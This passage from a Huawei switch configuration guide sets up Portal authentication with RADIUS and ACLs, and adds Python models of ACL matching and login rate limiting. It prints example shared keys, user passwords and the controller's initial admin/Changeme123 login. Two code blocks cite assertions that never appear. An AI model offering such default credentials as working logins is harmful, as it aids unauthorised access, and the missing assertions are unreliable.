web server. Post-authentication domain: code library, issue tracking system, Internet.]

VLAN Plan

Table 10-3 VLAN plan

VLAN ID   Function
101       VLAN for R&D employees
102       VLAN for marketing employees
103       VLAN for connection between the aggregation switch and core switch
104       VLAN to which interfaces connecting to the servers belong


Network Data Plan

Table 10-4 Network data plan

Item: Access switch (connecting to the R&D department)
  Interface GE0/0/1, VLAN 101: connects to employees' PCs.
  Interface GE0/0/2, VLAN 101: connects to the aggregation switch.

Item: Access switch (connecting to the marketing department)
  Interface GE0/0/1, VLAN 102: connects to employees' PCs.
  Interface GE0/0/2, VLAN 102: connects to the aggregation switch.

Item: Aggregation switch
  Interface GE1/0/1, VLAN 101: connects to the access switch of the R&D department.
    VLANIF101 IP address 192.168.0.1: functions as the gateway for R&D employees.
  Interface GE1/0/2, VLAN 102: connects to the access switch of the marketing department.
    VLANIF102 IP address 192.168.1.1: functions as the gateway for marketing employees.
  Interface GE1/0/3, VLAN 103: connects to the core switch.
    VLANIF103 IP address 172.16.2.1.

Item: Core switch
  Interface GE1/0/1, VLAN 103: connects to the aggregation switch.
    VLANIF103 IP address 172.16.2.2.
  Interface GE1/0/2, VLAN 104: connects to the server area and functions as the gateway for
    the servers.
    VLANIF104 IP address 172.16.1.254.

Item: Server
  Agile Controller (RADIUS server + Portal server): IP address 172.16.1.1
  DNS server: IP address 172.16.1.2
  Web server: IP address 172.16.1.3
  Code library: IP address 172.16.1.4
  Issue tracking system: IP address 172.16.1.5

Service Data Plan

Table 10-5 Service data plan

Item: Core switch
  Number of the ACL for R&D employees' post-authentication domain: 3001. You need to enter
  this ACL number when configuring authorization rules and results on the Agile Controller.
  Number of the ACL for marketing employees' post-authentication domain: 3002. You need to
  enter this ACL number when configuring authorization rules and results on the Agile Controller.
  Authentication server:
  l IP address: 172.16.1.1
  l Port number: 1812
  l RADIUS shared key: Admin@123
  Accounting server:
  l IP address: 172.16.1.1
  l Port number: 1813
  l RADIUS shared key: Admin@123
  l Accounting interval: 15
  Portal server:
  l IP address: 172.16.1.1
  l Port number that the switch uses to process Portal protocol packets: 2000
  l Destination port number in the packets that the switch sends to the Portal server: 50200
  l Portal authentication shared key: Admin@123
  Description:
  l The Service Controller (SC) of the Agile Controller integrates the RADIUS server and
    Portal server. Therefore, the IP addresses of the authentication server, accounting
    server, authorization server, and Portal server are all the SC's IP address.
  l Configure a RADIUS accounting server to collect user login and logout information. The
    port numbers of the authentication server and accounting server must be the same as
    the authentication and accounting port numbers of the RADIUS server.
  l Configure an authorization server to enable the RADIUS server to deliver authorization
    rules to the switch. The RADIUS shared key of the authorization server must be the same
    as those of the authentication server and accounting server.

Item: Agile Controller
  Host name: access.example.com. Users can use the domain name to access the Portal server.
  Device IP address: 172.16.1.254
  Authentication port: 1812
  Accounting port: 1813
  RADIUS shared key: Admin@123. It must be the same as that configured on the switch.
  Port number that the Portal server uses to receive packets: 50200
  Portal shared key: Admin@123. It must be the same as the Portal authentication shared key
  configured on the switch.
  Department: R&D
  l User: A
  l Account: A-123
  l Password: Huawei123
  Department: Marketing
  l User: B
  l Account: B-123
  l Password: Huawei123
  Two departments and two corresponding accounts have been created on the Agile Controller:
  the R&D department with the R&D employee account A-123, and the Marketing department with
  the marketing employee account B-123.
  Pre-authentication domain: Agile Controller (including RADIUS server and Portal server),
  DNS server, and web server
  Post-authentication domain:
  l R&D employees: code library, issue tracking system, and Internet
  l Marketing employees: Internet


Configuration Roadmap
1. Configure the access switch, aggregation switch, and core switch to ensure network
connectivity.
2. Configure Portal authentication on the core switch to implement user access control.
Configure parameters for connecting to the RADIUS server and those for connecting to
the Portal server, enable Portal authentication, and configure network access rights for
the pre-authentication domain and post-authentication domain.
3. Configure the Agile Controller:
a. Log in to the Agile Controller.
b. Add user accounts to the Agile Controller.
c. Add a switch to the Agile Controller and configure related parameters to ensure
normal communication between the Agile Controller and switch.
d. Add authorization results and authorization rules to grant different access rights to
R&D employees and marketing employees after they are successfully authenticated.

Procedure
Step 1 Configure the access switch to ensure network connectivity.
The following provides the configuration for SwitchA, the access switch connecting to the
R&D department. The configuration for SwitchB, the access switch connecting to the
marketing department, is similar to that for SwitchA.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan 101
[SwitchA-vlan101] quit
[SwitchA] interface gigabitethernet 0/0/1 //Interface connected to the R&D
department
[SwitchA-GigabitEthernet0/0/1] port link-type access
[SwitchA-GigabitEthernet0/0/1] port default vlan 101
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2 //Interface connected to the
aggregation switch
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 101
[SwitchA-GigabitEthernet0/0/2] quit
[SwitchA] quit
<SwitchA> save //Save the configuration.

Step 2 Configure the aggregation switch to ensure network connectivity.


<HUAWEI> system-view
[HUAWEI] sysname SwitchC
[SwitchC] dhcp enable //Enable the DHCP service.
[SwitchC] vlan batch 101 to 103
[SwitchC] interface gigabitethernet 1/0/1 //Interface of the access switch
connected to the R&D department
[SwitchC-GigabitEthernet1/0/1] port link-type trunk
[SwitchC-GigabitEthernet1/0/1] port trunk pvid vlan 101
[SwitchC-GigabitEthernet1/0/1] port trunk allow-pass vlan 101
[SwitchC-GigabitEthernet1/0/1] quit
[SwitchC] interface vlanif 101
[SwitchC-Vlanif101] ip address 192.168.0.1 255.255.255.0 //IP address segment
assigned to R&D employees
[SwitchC-Vlanif101] dhcp select interface
[SwitchC-Vlanif101] dhcp server dns-list 172.16.1.2
[SwitchC-Vlanif101] quit
[SwitchC] interface gigabitethernet 1/0/2 //Interface of the access switch
connected to the marketing department
[SwitchC-GigabitEthernet1/0/2] port link-type trunk
[SwitchC-GigabitEthernet1/0/2] port trunk pvid vlan 102


[SwitchC-GigabitEthernet1/0/2] port trunk allow-pass vlan 102


[SwitchC-GigabitEthernet1/0/2] quit
[SwitchC] interface vlanif 102
[SwitchC-Vlanif102] ip address 192.168.1.1 255.255.255.0 //IP address segment
assigned to marketing employees
[SwitchC-Vlanif102] dhcp select interface
[SwitchC-Vlanif102] dhcp server dns-list 172.16.1.2
[SwitchC-Vlanif102] quit
[SwitchC] interface gigabitethernet 1/0/3 //Interface connected to the core
switch
[SwitchC-GigabitEthernet1/0/3] port link-type trunk
[SwitchC-GigabitEthernet1/0/3] port trunk pvid vlan 103
[SwitchC-GigabitEthernet1/0/3] port trunk allow-pass vlan 103
[SwitchC-GigabitEthernet1/0/3] quit
[SwitchC] interface vlanif 103
[SwitchC-Vlanif103] ip address 172.16.2.1 255.255.255.0
[SwitchC-Vlanif103] quit
[SwitchC] ip route-static 172.16.1.0 255.255.255.0 172.16.2.2 //Configure
routes to the network segment in which the authentication server resides.
[SwitchC] quit
<SwitchC> save //Save the configuration.

Step 3 Configure the core switch.


1. Create VLANs and configure the VLANs allowed by interfaces so that packets can be
forwarded.
<HUAWEI> system-view
[HUAWEI] sysname SwitchD
[SwitchD] vlan batch 103 104
[SwitchD] interface gigabitethernet 1/0/1 //Interface connected to the
aggregation switch
[SwitchD-GigabitEthernet1/0/1] port link-type trunk
[SwitchD-GigabitEthernet1/0/1] port trunk allow-pass vlan 103
[SwitchD-GigabitEthernet1/0/1] quit
[SwitchD] interface vlanif 103
[SwitchD-Vlanif103] ip address 172.16.2.2 255.255.255.0
[SwitchD-Vlanif103] quit
[SwitchD] interface gigabitethernet 1/0/2 //Interface connected to the
server area
[SwitchD-GigabitEthernet1/0/2] port link-type access
[SwitchD-GigabitEthernet1/0/2] port default vlan 104
[SwitchD-GigabitEthernet1/0/2] quit
[SwitchD] interface vlanif 104
[SwitchD-Vlanif104] ip address 172.16.1.254 255.255.255.0 //Configure the
gateway address for the server area.
[SwitchD-Vlanif104] quit
[SwitchD] ip route-static 192.168.0.0 255.255.255.0 172.16.2.1 //Configure
routes to the network segment assigned to the R&D department.
[SwitchD] ip route-static 192.168.1.0 255.255.255.0 172.16.2.1 //Configure
routes to the network segment assigned to the marketing department.
[SwitchD] quit
<SwitchD> save //Save the configuration.

2. Configure parameters for connecting to the RADIUS server.


<SwitchD> system-view
[SwitchD] radius-server template policy //Create the RADIUS server
template policy.
[SwitchD-radius-policy] radius-server authentication 172.16.1.1 1812 //
Configure the IP address and port number of the RADIUS authentication server.
[SwitchD-radius-policy] radius-server accounting 172.16.1.1 1813 //
Configure the IP address and port number of the RADIUS accounting server.
[SwitchD-radius-policy] radius-server shared-key cipher Admin@123 //Set
the authentication key and accounting key to Admin@123.
[SwitchD-radius-policy] quit
[SwitchD] aaa //Enter the AAA view.
[SwitchD-aaa] authentication-scheme auth //Configure the authentication
scheme auth.
[SwitchD-aaa-authen-auth] authentication-mode radius //Set the
authentication mode to RADIUS.


[SwitchD-aaa-authen-auth] quit
[SwitchD-aaa] accounting-scheme acco //Configure the accounting scheme
acco.
[SwitchD-aaa-accounting-acco] accounting-mode radius //Set the accounting
mode to RADIUS.
[SwitchD-aaa-accounting-acco] accounting realtime 15 //Set the real-time
accounting interval to 15 minutes.
[SwitchD-aaa-accounting-acco] quit
[SwitchD-aaa] domain portal //Configure a domain.
[SwitchD-aaa-domain-portal] authentication-scheme auth //Bind the
authentication scheme auth to the domain.
[SwitchD-aaa-domain-portal] accounting-scheme acco //Bind the accounting
scheme acco to the domain.
[SwitchD-aaa-domain-portal] radius-server policy //Bind the RADIUS server
template policy to the domain.
[SwitchD-aaa-domain-portal] quit
[SwitchD-aaa] quit
[SwitchD] domain portal //Configure portal as the global default domain.

3. Configure parameters for connecting to the Portal server.


[SwitchD] web-auth-server portal_huawei //Configure the Portal server
template portal_huawei.
[SwitchD-web-auth-server-portal_huawei] server-ip 172.16.1.1 //Set the
Portal server IP address.
[SwitchD-web-auth-server-portal_huawei] source-ip 172.16.1.254 //Set the
IP address that the switch uses to communicate with the Portal server.
[SwitchD-web-auth-server-portal_huawei] port 50200 //Set the destination
port number in the packets that the switch sends to the Portal server to
50200, which is the same as the port number that the Portal server uses to
receive packets. The default destination port number on the switch is 50100,
and you must change it to 50200 manually, so that it matches the port number
on the Portal server.
[SwitchD-web-auth-server-portal_huawei] shared-key cipher Admin@123 //
Configure the shared key for communication with the Portal server, which must
be the same as that configured on the Portal server.
[SwitchD-web-auth-server-portal_huawei] url http://access.example.com:8080/
portal //Configure the URL for the Portal authentication page, in which
access.example.com indicates the host name of the Portal server. The domain
name is recommended in the URL so that the Portal authentication page can be
pushed to users faster and more securely. To use the domain name in the URL,
you must configure the mapping between this domain name access.example.com
and Portal server IP address on the DNS server in advance.
[SwitchD-web-auth-server-portal_huawei] quit
[SwitchD] web-auth-server listening-port 2000 //Configure the port number
that the switch uses to process Portal protocol packets. The default port
number is 2000. If the port number is changed on the server, change it
accordingly on the switch.
[SwitchD] portal quiet-period //Enable the quiet function for Portal
authentication users. If the number of times that a Portal authentication
user fails to be authenticated within 60 seconds exceeds the specified value,
the device discards the user's Portal authentication request packets for a
period to prevent impact of frequent authentication failures on the system.
[SwitchD] portal quiet-times 5 //Configure the maximum number of
authentication failures within 60 seconds before the device quiets a Portal
authentication user.
[SwitchD] portal timer quiet-period 240 //Set the quiet period to 240
seconds.

4. Enable Portal authentication.


[SwitchD] authentication unified-mode //Set the NAC mode to unified. By
default, the unified mode is enabled. After the NAC mode is changed, save the
configuration and restart the device to make the configuration take effect.
[SwitchD] interface vlanif 103
[SwitchD-Vlanif103] authentication portal //Enable Portal authentication
on the interface.
[SwitchD-Vlanif103] web-auth-server portal_huawei layer3 //Bind the Portal
server template to the interface, so the interface can control user access to
the enterprise network. If user terminals and the switch are connected
through a Layer 2 network, set the Portal authentication mode to direct. If
user terminals and the switch are connected through a Layer 3 network, set
the Portal authentication mode to layer3.
[SwitchD-Vlanif103] quit

5. Configure network access rights for the pre-authentication domain and post-
authentication domain.
[SwitchD] authentication free-rule 1 destination ip 172.16.1.2 mask
255.255.255.255 //Configure authentication-free rules for Portal
authentication users, so that these users can access the DNS server before
the authentication.
[SwitchD] authentication free-rule 2 destination ip 172.16.1.3 mask
255.255.255.255 //Configure authentication-free rules for Portal
authentication users, so that these users can access the web server before
the authentication.
[SwitchD] acl 3001 //Configure the post-authentication domain for R&D
employees.
[SwitchD-acl-adv-3001] rule 1 permit ip //Allow R&D employees to access
all resources.
[SwitchD-acl-adv-3001] quit
[SwitchD] acl 3002 //Configure the post-authentication domain for
marketing employees.
[SwitchD-acl-adv-3002] rule 1 deny ip destination 172.16.1.4 0 //Prevent
marketing employees from accessing the code library.
[SwitchD-acl-adv-3002] rule 2 deny ip destination 172.16.1.5 0 //Prevent
marketing employees from accessing the issue tracking system.
[SwitchD-acl-adv-3002] rule 3 permit ip //Allow marketing employees to
access other resources.
[SwitchD-acl-adv-3002] quit
[SwitchD] quit
<SwitchD> save //Save the configuration.
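ACL 3001 and ACL 3002 above are the post-authentication domains that the Agile Controller assigns by number after a successful login, while the two authentication-free rules define what an unauthenticated terminal may reach. The Python model below is an added example and not Huawei code: it evaluates a user's flow against exactly those rules to show the two things a practitioner checks before delivering an ACL by RADIUS, namely Huawei wildcard masks (0 is the CLI shorthand for 0.0.0.0, an exact host; 0.0.0.255 covers a /24) and first-match order by rule ID, which is why the deny rules in ACL 3002 carry lower IDs than the final permit. The action taken when no rule matches is passed in as a parameter and assumed to be deny; the page's ACLs both end with an explicit permit ip and so never depend on it. The sample source addresses come from the R&D and marketing subnets in the data plan.

```python
import ipaddress


def _ip(addr):
    return int(ipaddress.IPv4Address(addr))


def parse_rule(rule):
    """Parse the subset of Huawei advanced-ACL syntax used on this page:
    'rule <id> permit|deny ip [source <addr> <wildcard>] [destination <addr> <wildcard>]'.
    A set bit in the wildcard means 'do not care'; a missing source/destination means any."""
    tokens = rule.split()
    if tokens[0] != "rule" or tokens[3] != "ip":
        raise ValueError(f"unsupported rule: {rule}")
    parsed = {"id": int(tokens[1]), "action": tokens[2], "source": None, "destination": None}
    for i in range(4, len(tokens), 3):
        field, addr, wildcard = tokens[i:i + 3]
        if wildcard == "0":                    # CLI shorthand for 0.0.0.0 (exact host)
            wildcard = "0.0.0.0"
        parsed[field] = (_ip(addr), _ip(wildcard))
    return parsed


def rule_matches(rule, src, dst):
    for field, ip in (("source", src), ("destination", dst)):
        spec = rule[field]
        if spec is None:
            continue
        addr, wildcard = spec
        # OR-ing both sides with the wildcard forces the don't-care bits to compare equal.
        if (_ip(ip) | wildcard) != (addr | wildcard):
            return False
    return True


def evaluate_acl(rules, src, dst, default="deny"):
    """First match wins, in ascending rule-ID order (rules are applied by ID, not by the
    order they were typed). 'default' is the assumed action when nothing matches."""
    for rule in sorted(map(parse_rule, rules), key=lambda r: r["id"]):
        if rule_matches(rule, src, dst):
            return rule["action"]
    return default


def free_rule_allows(free_rules, dst):
    """'authentication free-rule <n> destination ip <addr> mask <mask>': traffic to these
    destinations passes before authentication; everything else is blocked (HTTP redirected)."""
    for rule in free_rules:
        tokens = rule.split()
        addr = tokens[tokens.index("ip") + 1]
        mask = tokens[tokens.index("mask") + 1]
        if ipaddress.IPv4Address(dst) in ipaddress.IPv4Network(f"{addr}/{mask}", strict=False):
            return True
    return False


# Rules exactly as configured on SwitchD above.
FREE_RULES = [
    "authentication free-rule 1 destination ip 172.16.1.2 mask 255.255.255.255",
    "authentication free-rule 2 destination ip 172.16.1.3 mask 255.255.255.255",
]
ACL_3001 = ["rule 1 permit ip"]                     # R&D post-authentication domain
ACL_3002 = [                                         # marketing post-authentication domain
    "rule 1 deny ip destination 172.16.1.4 0",
    "rule 2 deny ip destination 172.16.1.5 0",
    "rule 3 permit ip",
]
POST_AUTH_ACL = {"rd": ACL_3001, "marketing": ACL_3002}


def decide(state, src, dst):
    """state is 'pre-auth' or the authorization result delivered by RADIUS ('rd'/'marketing')."""
    if state == "pre-auth":
        return "permit" if free_rule_allows(FREE_RULES, dst) else "deny"
    return evaluate_acl(POST_AUTH_ACL[state], src, dst)


if __name__ == "__main__":
    for state, src, dst in [("pre-auth", "192.168.1.50", "172.16.1.2"),
                            ("pre-auth", "192.168.1.50", "172.16.1.4"),
                            ("rd", "192.168.0.50", "172.16.1.4"),
                            ("marketing", "192.168.1.50", "172.16.1.4"),
                            ("marketing", "192.168.1.50", "203.0.113.10")]:
        print(f"{state:10} {src} -> {dst}: {decide(state, src, dst)}")
```

The rule-ID ordering is the trap to watch for: if the marketing ACL were typed with "rule 1 permit ip" first and the two deny rules after it, the permit would shadow them and marketing employees would reach the code library, which is exactly the case the assertions below exercise.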
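The portal quiet-period, portal quiet-times 5 and portal timer quiet-period 240 commands in Step 3.3 above limit how fast one terminal can hammer the Portal login with guessed credentials. The Python class below is an added example, not Huawei code: it keeps a sliding 60-second window of failures per user key, quiets the user for the configured period once the configured count is reached, and drops further authentication requests while the user is quiet. The 60-second window and the values 5 and 240 are the page's; treating "reaching the count" (rather than exceeding it) as the trigger and keying on the client IP address are assumptions, as is the callback-based authenticate hook used to drive the model.

```python
from collections import defaultdict, deque


class PortalQuietGuard:
    """Model of the Portal quiet function: after quiet_times failures inside a
    60-second window, the user is quieted for quiet_period seconds."""

    WINDOW = 60  # seconds; the page states failures are counted within 60 seconds

    def __init__(self, quiet_times=5, quiet_period=240):
        self.quiet_times = quiet_times
        self.quiet_period = quiet_period
        self.failures = defaultdict(deque)   # user key -> timestamps of recent failures
        self.quiet_until = {}                # user key -> time the quiet state ends

    def is_quiet(self, user, now):
        until = self.quiet_until.get(user)
        if until is None:
            return False
        if now >= until:                     # quiet period expired: release and reset
            del self.quiet_until[user]
            self.failures[user].clear()
            return False
        return True

    def record_failure(self, user, now):
        """Register one failed attempt; returns True if the user is (now) quiet."""
        if self.is_quiet(user, now):
            return True
        window = self.failures[user]
        window.append(now)
        while window and now - window[0] > self.WINDOW:   # forget failures older than 60 s
            window.popleft()
        if len(window) >= self.quiet_times:
            self.quiet_until[user] = now + self.quiet_period
            window.clear()
            return True
        return False

    def handle_request(self, user, now, authenticate):
        """Gate for one Portal authentication request. 'authenticate' is a callable
        (assumption) that returns True when the RADIUS server accepts the credentials."""
        if self.is_quiet(user, now):
            return "dropped"                 # request discarded without touching RADIUS
        if authenticate():
            self.failures[user].clear()
            return "accept"
        self.record_failure(user, now)
        return "reject"


if __name__ == "__main__":
    guard = PortalQuietGuard(quiet_times=5, quiet_period=240)
    for t in range(6):                       # constructed burst of bad passwords from one client
        print(t, guard.handle_request("192.168.1.50", t, lambda: False))
    print(245, guard.handle_request("192.168.1.50", 245, lambda: True))
```

Two behaviours are worth confirming with the assertions below: four failures spread over more than 60 seconds never trigger the quiet state, and while a client is quiet even a correct password is dropped, which is the intended cost of the protection and the reason the quiet period should stay short.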

Step 4 Configure the Agile Controller.


1. Log in to the Agile Controller.
a. Open Internet Explorer, enter the Agile Controller address in the address box,
and press Enter.
The following table provides two types of Agile Controller addresses.

Address Format                      Description
https://Agile Controller-IP:8443    In the address, Agile Controller-IP indicates the Agile Controller IP address.
Agile Controller IP address         If port 80 is enabled during installation, you can access the Agile
                                    Controller by simply entering its IP address without the port number.
                                    The Agile Controller address will automatically change to
                                    https://Agile Controller-IP:8443.

b. Enter the administrator account and password.


If you log in to the Agile Controller for the first time, use the super administrator
account admin and password Changeme123. Change the password immediately
after logging in. Otherwise, the Agile Controller cannot be used.
2. Create departments and accounts. The following describes how to create the R&D
department. Create the Marketing department similarly.
a. Choose Resource > User > User Management.
b. Click the Department tab in the operation area on the right. Then click Add under
the Department tab, and add the department R&D.


c. Click the User tab in the operation area on the right. Then click Add under the User
tab, and add the user A.


d. Click in the Operation column on the right of user A. The Account Management page is
displayed. Click Add, and create a common account A-123 with the password Huawei123.


e. On the User tab page, select user A and click Transfer to add user A to the R&D
department.


3. Add a switch to the Agile Controller and configure related parameters to ensure normal
communication between the Agile Controller and switch.
a. Choose Resource > Device > Device Management.
b. Click Add.
c. Configure parameters for the switch.
Parameter | Value | Description
Name | SW | -
IP Address | 172.16.1.254 | The interface must be able to communicate with the SC.
Device series | Huawei Quidway Series | -
Authentication Key | Admin@123 | It must be the same as the shared key of the RADIUS authentication server configured on the switch.
Charging Key | Admin@123 | It must be the same as the shared key of the RADIUS accounting server configured on the switch.
Real-time charging interval (minute) | 15 | It must be the same as the real-time accounting interval configured on the switch.
Port | 2000 | This is the port that the switch uses to communicate with the Portal server. Retain the default value.
Portal Key | Admin@123 | It must be the same as the Portal shared key configured on the switch.
Allowed IP Addresses | 192.168.0.1/24; 192.168.1.1/24 | -


d. Click OK.
4. Configure employee authorization. This example describes how to configure R&D
employee authorization. The configuration procedure for marketing employees is the
same, except that the network resources the two types of employees can access are
different.
a. Choose Policy > Permission Control > Authentication and Authorization >
Authorization Result, and configure resources that R&D employees can access
after authentication and authorization.

Parameter | Value | Description
Name | R&D employee post-authentication domain | -
Service Type | Access Service | -
ACL Number/AAA User Group | 3001 | The ACL number must be the same as the number of the ACL configured for R&D employees on the switch.


b. Choose Policy > Permission Control > Authentication and Authorization >
Authorization Rule, and specify the authorization conditions for R&D employees.
Parameter | Value | Description
Name | R&D employee authorization rule | -
Service Type | Access User | -
Department | R&D | -
Authorization Result | R&D employee post-authentication domain | -


Step 5 Verify the configuration.


l Employees can access only the Agile Controller, DNS, and web servers before
authentication.
l The Portal authentication page is pushed to an employee when the employee attempts to
visit an Internet website. After the employee enters the correct account and password, the
requested web page is displayed.
l R&D employee A can access the Internet, code library, and issue tracking system after
authentication. Marketing employee B can access the Internet but not the code library
and issue tracking system after authentication.


l After an employee is authenticated, run the display access-user command on the switch.
The command output shows that the employee is online.
----End

Configuration Files
# Configuration file of the access switch for the R&D department (The configuration file of the access switch for the marketing department is similar.)
#
sysname SwitchA
#
vlan batch 101
#
interface GigabitEthernet0/0/1
port link-type access
port default vlan 101
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 101
#
return

# Configuration file of the aggregation switch


#
sysname SwitchC
#
vlan batch 101 to 103
#
dhcp enable
#
interface Vlanif101
ip address 192.168.0.1 255.255.255.0
dhcp select interface
dhcp server dns-list 172.16.1.2
#
interface Vlanif102
ip address 192.168.1.1 255.255.255.0
dhcp select interface
dhcp server dns-list 172.16.1.2
#
interface Vlanif103
ip address 172.16.2.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk pvid vlan 101
port trunk allow-pass vlan 101
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk pvid vlan 102
port trunk allow-pass vlan 102
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk pvid vlan 103
port trunk allow-pass vlan 103
#
ip route-static 172.16.1.0 255.255.255.0 172.16.2.2
#
return

# Configuration file of the core switch


#
sysname SwitchD


#
vlan batch 103 to 104
#
domain portal
#
radius-server template policy
radius-server shared-key cipher %#%#1*yT+0O\X;V}hP,G^TMN7mTXA^mIz)SoR:86;lNK%#%#
radius-server authentication 172.16.1.1 1812 weight 80
radius-server accounting 172.16.1.1 1813 weight 80
#
acl number 3001
rule 1 permit ip
acl number 3002
rule 1 deny ip destination 172.16.1.4 0
rule 2 deny ip destination 172.16.1.5 0
rule 3 permit ip
#
web-auth-server portal_huawei
server-ip 172.16.1.1
port 50200
shared-key cipher %#%#q9a^<=Ct5'=0n40/1g}/m6Mo,U9u5!s(GYM}Z{<~%#%#
url http://access.example.com:8080/portal
source-ip 172.16.1.254
#
aaa
authentication-scheme auth
authentication-mode radius
accounting-scheme acco
accounting-mode radius
accounting realtime 15
domain portal
authentication-scheme auth
accounting-scheme acco
radius-server policy
#
interface Vlanif103
ip address 172.16.2.2 255.255.255.0
web-auth-server portal_huawei layer3
authentication portal
#
interface Vlanif104
ip address 172.16.1.254 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 103
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 104
#
ip route-static 192.168.0.0 255.255.255.0 172.16.2.1
ip route-static 192.168.1.0 255.255.255.0 172.16.2.1
#
authentication free-rule 1 destination ip 172.16.1.2 mask 255.255.255.255
authentication free-rule 2 destination ip 172.16.1.3 mask 255.255.255.255
portal quiet-period
portal timer quiet-period 240
portal quiet-times 5
#
return


10.5.2 Example for Configuring Portal Authentication to Control Internal User Access to the Enterprise Network (Authentication Point on Aggregation Switch) (V200R007C00 and Earlier Versions, V200R008C00)

Portal Authentication Overview


Portal authentication is a Network Admission Control (NAC) method. Portal authentication is
also called web authentication. Generally, Portal authentication websites are referred to as
Portal websites. Users must be authenticated by the Portal websites before they can use
network services.

Portal authentication is insecure, but allows flexible networking because no client software is required on users' terminals. 802.1x authentication is another NAC method. It is more secure than Portal authentication, but requires the installation of client software on users' terminals, which makes networking inflexible. Like Portal authentication, MAC address authentication does not require the installation of client software, but user terminals' MAC addresses must be registered on the authentication server, which makes network configuration and management complex.

Portal authentication applies to the users who are sparsely distributed and move frequently,
for example, guests of a company.

Configuration Notes
l This example applies to all S12700 versions.
  NOTE: For details about software mappings, see Version Mapping Search for Huawei Campus Switches.
l Huawei's Agile Controller in V100R001C00 functions as the Portal server and RADIUS
server in this example. For the Agile Controller, the minimum version required is
V100R001C00.
l The RADIUS authentication and accounting shared keys and Portal shared key on the
switch must be the same as those on the Agile Controller server.
l By default, the switch allows the packets from RADIUS and Portal servers to pass. You
do not need to configure authentication-free rules for the two servers on the switch.

Networking Requirements
An enterprise needs to deploy an identity authentication system to control employees' network
access rights and allow only authorized users to access the network.

The enterprise has the following requirements:


l The authentication operations should be simple. The authentication system only
performs access authorization, and minimal client software is installed on user terminals.
l Moderate security control is required. To facilitate maintenance, a moderate number of
authentication points need to be deployed on the aggregation switch.
l A unified identity authentication mechanism is used to authenticate all terminals
accessing the campus network and deny access from unauthorized terminals.


l R&D employees can connect only to public servers (such as the web and DNS servers)
of the enterprise before the authentication, and can connect to both the intranet (code
library and issue tracking system) and Internet after being authenticated.
l Marketing employees can connect only to public servers (such as the web and DNS
servers) of the enterprise before the authentication, and can connect only to the Internet
after being authenticated.

Figure 10-36 Portal authentication deployed at the aggregation layer

[Figure: the Internet is reached through the core switch. The pre-authentication domain holds the Agile Controller (includes Portal and RADIUS servers), the DNS server, and the web server; the post-authentication domain holds the code configuration base and the issue tracking system. Aggregation switch SwitchC is the authentication point: GE1/0/1 connects to access switch SwitchA (R&D Dept., GE0/0/1 and GE0/0/2), GE1/0/2 connects to access switch SwitchB (Marketing Dept., GE0/0/1 and GE0/0/2), and GE1/0/3 connects to the servers. Employees use PCs and a laptop.]

VLAN Plan

Table 10-6 VLAN plan


VLAN ID | Function
101 | VLAN for R&D employees
102 | VLAN for marketing employees
103 | VLAN to which interfaces connecting to the servers belong


Network Data Plan

Table 10-7 Network data plan


Item | Data | Description
Access switch (connecting to the R&D department) | Interface number: GE0/0/1; VLAN: 101 | Connects to employees' PCs.
Access switch (connecting to the R&D department) | Interface number: GE0/0/2; VLAN: 101 | Connects to the aggregation switch.
Access switch (connecting to the marketing department) | Interface number: GE0/0/1; VLAN: 102 | Connects to employees' PCs.
Access switch (connecting to the marketing department) | Interface number: GE0/0/2; VLAN: 102 | Connects to the aggregation switch.
Aggregation switch | Interface number: GE1/0/1; VLAN: 101 | Connects to the access switch of the R&D department.
Aggregation switch | VLANIF101 IP address: 192.168.0.1 | Functions as the gateway for R&D employees.
Aggregation switch | Interface number: GE1/0/2; VLAN: 102 | Connects to the access switch of the marketing department.
Aggregation switch | VLANIF102 IP address: 192.168.1.1 | Functions as the gateway for marketing employees.
Aggregation switch | Interface number: GE1/0/3; VLAN: 103 | Connects to the enterprise server area.
Aggregation switch | VLANIF103 IP address: 172.16.1.254 | Functions as the gateway for servers.
Server: Agile Controller (RADIUS server + Portal server) | IP address: 172.16.1.1 | -
Server: DNS server | IP address: 172.16.1.2 | -
Server: Web server | IP address: 172.16.1.3 | -
Server: Code library | IP address: 172.16.1.4 | -
Server: Issue tracking system | IP address: 172.16.1.5 | -


Service Data Plan

Table 10-8 Service data plan


Item | Data | Description
Aggregation switch | Number of the ACL for R&D employees' post-authentication domain: 3001 | You need to enter this ACL number when configuring authorization rules and results on the Agile Controller.
Aggregation switch | Number of the ACL for marketing employees' post-authentication domain: 3002 | You need to enter this ACL number when configuring authorization rules and results on the Agile Controller.
Aggregation switch | Authentication server: IP address 172.16.1.1, port number 1812, RADIUS shared key Admin@123. Accounting server: IP address 172.16.1.1, port number 1813, RADIUS shared key Admin@123, accounting interval 15. Portal server: IP address 172.16.1.1, port number that the switch uses to process Portal protocol packets 2000, destination port number in the packets that the switch sends to the Portal server 50200, Portal authentication shared key Admin@123 | The Service Controller (SC) of the Agile Controller integrates the RADIUS server and Portal server. Therefore, the IP addresses of the authentication server, accounting server, authorization server, and Portal server are the SC's IP address. Configure a RADIUS accounting server to collect user login and logout information; the port numbers of the authentication server and accounting server must be the same as the authentication and accounting port numbers of the RADIUS server. Configure an authorization server to enable the RADIUS server to deliver authorization rules to the switch; the RADIUS shared key of the authorization server must be the same as those of the authentication server and accounting server.
Agile Controller | Host name: access.example.com | Users can use the domain name to access the Portal server.
Agile Controller | Device IP address: 172.16.1.254 | -
Agile Controller | Authentication port: 1812 | -
Agile Controller | Accounting port: 1813 | -
Agile Controller | RADIUS shared key: Admin@123 | The RADIUS shared key must be the same as that configured on the switch.
Agile Controller | Port number that the Portal server uses to receive packets: 50200 | -
Agile Controller | Portal shared key: Admin@123 | It must be the same as the Portal authentication shared key configured on the switch.
Agile Controller | Department: R&D (User: A; Account: A-123; Password: Huawei123). Department: Marketing (User: B; Account: B-123; Password: Huawei123) | Two departments and two corresponding accounts have been created on the Agile Controller: R&D department and an R&D employee account A-123; Marketing department and a marketing employee account B-123.
Pre-authentication domain | Agile Controller (including RADIUS server and Portal server), DNS server, and web server | -
